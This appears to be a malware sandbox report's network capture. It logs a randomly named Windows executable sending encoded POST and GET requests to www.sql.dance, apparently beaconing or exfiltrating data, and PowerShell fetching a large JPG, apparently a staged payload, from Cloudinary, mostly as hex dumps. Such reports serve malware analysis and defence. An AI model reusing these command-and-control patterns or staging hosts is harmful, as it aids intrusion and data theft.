                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzIwZDA0NGUtMjNmNC00NDA2LTk5ZGItYTM3NTY2MDE0N2IzIiwicGFnZV90aW1lIjoxNzMzMzE0Mj


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.849816199.59.243.2278060C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 4, 2024 13:10:14.394915104 CET1779OUTPOST /9p84/ HTTP/1.1
                                                                                                      Host: www.sql.dance
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1242
                                                                                                      Origin: http://www.sql.dance
                                                                                                      Referer: http://www.sql.dance/9p84/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                                                                                                      Data Raw: 43 4a 45 38 56 3d 68 58 44 6e 5a 75 47 68 74 4b 5a 4f 72 35 67 49 4d 5a 43 71 34 2b 37 45 64 62 47 6e 72 48 66 58 33 69 49 46 77 31 4a 62 6d 38 66 6b 45 48 6a 69 4f 67 50 78 45 4c 58 38 4f 63 54 75 49 52 36 71 71 64 37 2f 2b 32 67 57 63 75 74 74 54 4f 44 32 6c 62 5a 74 48 64 67 71 44 62 63 50 4c 78 4f 74 75 4f 64 43 4f 6e 4b 71 74 43 4c 64 42 4e 67 49 51 67 4e 62 30 4d 2b 6c 72 56 62 34 47 43 55 68 36 4e 31 78 66 30 33 57 79 73 55 72 7a 33 70 33 77 37 33 4d 49 65 48 70 43 49 44 49 31 75 4d 6d 41 42 55 49 64 4e 51 42 53 48 4b 63 49 37 75 66 37 72 47 37 2f 4b 63 74 5a 64 78 49 51 6d 42 70 33 76 6c 32 30 52 32 45 54 52 57 36 4c 30 53 35 4a 41 4a 61 66 39 67 72 42 43 79 6b 4b 4b 76 4b 49 66 74 2f 31 48 57 44 35 46 56 77 34 4a 31 64 5a 70 76 61 66 59 4c 41 6c 35 36 44 4f 4d 65 66 4f 4d 71 66 70 70 50 42 44 47 34 2f 41 57 76 74 66 73 35 64 69 36 42 61 37 52 31 34 47 55 64 32 6d 67 56 48 45 49 4d 37 66 6e 53 6e 38 30 74 69 50 6f 61 36 32 46 48 68 46 53 78 72 35 6b 32 79 56 56 76 7a 77 46 6a 64 6c 67 67 6e [TRUNCATED]
                                                                                                      Data Ascii: CJE8V=hXDnZuGhtKZOr5gIMZCq4+7EdbGnrHfX3iIFw1Jbm8fkEHjiOgPxELX8OcTuIR6qqd7/+2gWcuttTOD2lbZtHdgqDbcPLxOtuOdCOnKqtCLdBNgIQgNb0M+lrVb4GCUh6N1xf03WysUrz3p3w73MIeHpCIDI1uMmABUIdNQBSHKcI7uf7rG7/KctZdxIQmBp3vl20R2ETRW6L0S5JAJaf9grBCykKKvKIft/1HWD5FVw4J1dZpvafYLAl56DOMefOMqfppPBDG4/AWvtfs5di6Ba7R14GUd2mgVHEIM7fnSn80tiPoa62FHhFSxr5k2yVVvzwFjdlggnpthDT7jaaao54fA/l5+aCrA9XN3S0zziHtufNeYC5ze8JPFS24kmh2pEqSviK9tnDIMZNiK2dcnriVT5HH7e/DxuvKKg76OXjCouVn14IipFeEOkguryWhELpBjWCQmN8Y6H/LgQA70dhAdVf8v0i6Z1Dg/DajVEKMyb0fY4rJUQHEtI8awEaxgqEWbXB0y70xNiTuCZQuCcbMb2zwrsz0j/GgfRISokxsdJU5zJPFa6VlddQzKhUHlFEtYWPVGRk6ROVDwyhAcYBWPY2Un4lqVDmPwQrAljpVqAiiG7VJDK6djSp9Ls4yjlUcjC6SG2qGJtRMs9cK/WOclLAwh7AiufsDRnx3JlxqGVV6yhRfGusSr9qDgUYmi9o92T8z6p6M685Db8gT6jl+k1MRfiZ2nyaTImV0185/pTWtkYwZKPvTHbSb4C6gV4WKe6Og7qu6DzqaERRsnBZ/kEEbGa3XdBVIEvCYC/5zyo9em7bFr1FTsjmHwPzqeYwJQxnoIH+eMwOl74JAzxfmJD95V5dzSkDUMpgKtvKWYPR5SA0XzQtb4SBiYIGtaAGpYBsclNgnsSpSIzMnDN2ZO5cPMEYlyZkL4rUFBxBg81ErCpeO/HeTiawfTaW2wJS0L0c9gAorJa/ZR11AUazXIboxbl8ZRt6mKF1T66CJ [TRUNCATED]
                                                                                                      Dec 4, 2024 13:10:15.528443098 CET1236INHTTP/1.1 200 OK
                                                                                                      date: Wed, 04 Dec 2024 12:10:15 GMT
                                                                                                      content-type: text/html; charset=utf-8
                                                                                                      content-length: 1102
                                                                                                      x-request-id: 596439ea-82e1-46d3-b792-21bcbd0e3891
                                                                                                      cache-control: no-store, max-age=0
                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_KW7KGAbhVYKpfk9+4Y7JKvZeDxWQ9VyfyZs49bTZ0NYrGOIQxJQYyT9QIaQCzy6UESVEacWJcjfeuo/K5qZlyA==
                                                                                                      set-cookie: parking_session=596439ea-82e1-46d3-b792-21bcbd0e3891; expires=Wed, 04 Dec 2024 12:25:15 GMT; path=/
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4b 57 37 4b 47 41 62 68 56 59 4b 70 66 6b 39 2b 34 59 37 4a 4b 76 5a 65 44 78 57 51 39 56 79 66 79 5a 73 34 39 62 54 5a 30 4e 59 72 47 4f 49 51 78 4a 51 59 79 54 39 51 49 61 51 43 7a 79 36 55 45 53 56 45 61 63 57 4a 63 6a 66 65 75 6f 2f 4b 35 71 5a 6c 79 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_KW7KGAbhVYKpfk9+4Y7JKvZeDxWQ9VyfyZs49bTZ0NYrGOIQxJQYyT9QIaQCzy6UESVEacWJcjfeuo/K5qZlyA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                      Dec 4, 2024 13:10:15.528939009 CET555INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTk2NDM5ZWEtODJlMS00NmQzLWI3OTItMjFiY2JkMGUzODkxIiwicGFnZV90aW1lIjoxNzMzMzE0Mj


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.849822199.59.243.2278060C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 4, 2024 13:10:17.045541048 CET486OUTGET /9p84/?CJE8V=sVrHaezIocwvk586NbKL/ZmiafOvpGHuxCd8uk51gcnLQEXEQAeULabxZfXafDaZqd/22GpcW/h9erqwiYl6Kq4oLeU8CyaDpPEVNRKQpnjvGs8eQi8Qsuigmn/6Gj17jw==&-DiH=2XvD5 HTTP/1.1
                                                                                                      Host: www.sql.dance
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                                                                                                      Dec 4, 2024 13:10:18.203358889 CET1236INHTTP/1.1 200 OK
                                                                                                      date: Wed, 04 Dec 2024 12:10:17 GMT
                                                                                                      content-type: text/html; charset=utf-8
                                                                                                      content-length: 1478
                                                                                                      x-request-id: c39dfbed-d988-4c9a-9a8b-931f10f72cd7
                                                                                                      cache-control: no-store, max-age=0
                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DfII99sitP5HyQA1+f3m6ApYylUHNYgBvU4Ts9KMdu48k2rFmhbHzU+Lpy9sDNonjmBgyn+BFMO2v4dUy2hjHA==
                                                                                                      set-cookie: parking_session=c39dfbed-d988-4c9a-9a8b-931f10f72cd7; expires=Wed, 04 Dec 2024 12:25:18 GMT; path=/
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 66 49 49 39 39 73 69 74 50 35 48 79 51 41 31 2b 66 33 6d 36 41 70 59 79 6c 55 48 4e 59 67 42 76 55 34 54 73 39 4b 4d 64 75 34 38 6b 32 72 46 6d 68 62 48 7a 55 2b 4c 70 79 39 73 44 4e 6f 6e 6a 6d 42 67 79 6e 2b 42 46 4d 4f 32 76 34 64 55 79 32 68 6a 48 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DfII99sitP5HyQA1+f3m6ApYylUHNYgBvU4Ts9KMdu48k2rFmhbHzU+Lpy9sDNonjmBgyn+BFMO2v4dUy2hjHA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                      Dec 4, 2024 13:10:18.203557014 CET931INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzM5ZGZiZWQtZDk4OC00YzlhLTlhOGItOTMxZjEwZjcyY2Q3IiwicGFnZV90aW1lIjoxNzMzMzE0Mj


                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.849705151.101.129.1374436364C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-04 12:08:26 UTC127OUTGET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                                                                                                      Host: res.cloudinary.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-12-04 12:08:27 UTC804INHTTP/1.1 200 OK
                                                                                                      Connection: close
                                                                                                      Content-Length: 2230233
                                                                                                      Content-Type: image/jpeg
                                                                                                      Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
                                                                                                      Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
                                                                                                      Date: Wed, 04 Dec 2024 12:08:27 GMT
                                                                                                      Strict-Transport-Security: max-age=604800
                                                                                                      Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                                      Server-Timing: cld-fastly;dur=325;cpu=91;start=2024-12-04T12:08:26.913Z;desc=miss,rtt;dur=170,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)",cloudinary;dur=222;start=2024-12-04T12:08:27.007Z
                                                                                                      Server: Cloudinary
                                                                                                      Timing-Allow-Origin: *
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Accept-Ranges: bytes
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                                                      x-request-id: 6f487a4c60d72621f2efeecff85ca20a
                                                                                                      2024-12-04 12:08:27 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                      Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                      2024-12-04 12:08:27 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                                                      Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                                                      2024-12-04 12:08:27 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                                                      Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                                                      2024-12-04 12:08:27 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                                                      Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                                      2024-12-04 12:08:27 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                                      Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                                      2024-12-04 12:08:27 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                                      Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                                                      2024-12-04 12:08:27 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                                      Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                                      2024-12-04 12:08:27 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                                      Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                                      2024-12-04 12:08:27 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                                      Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
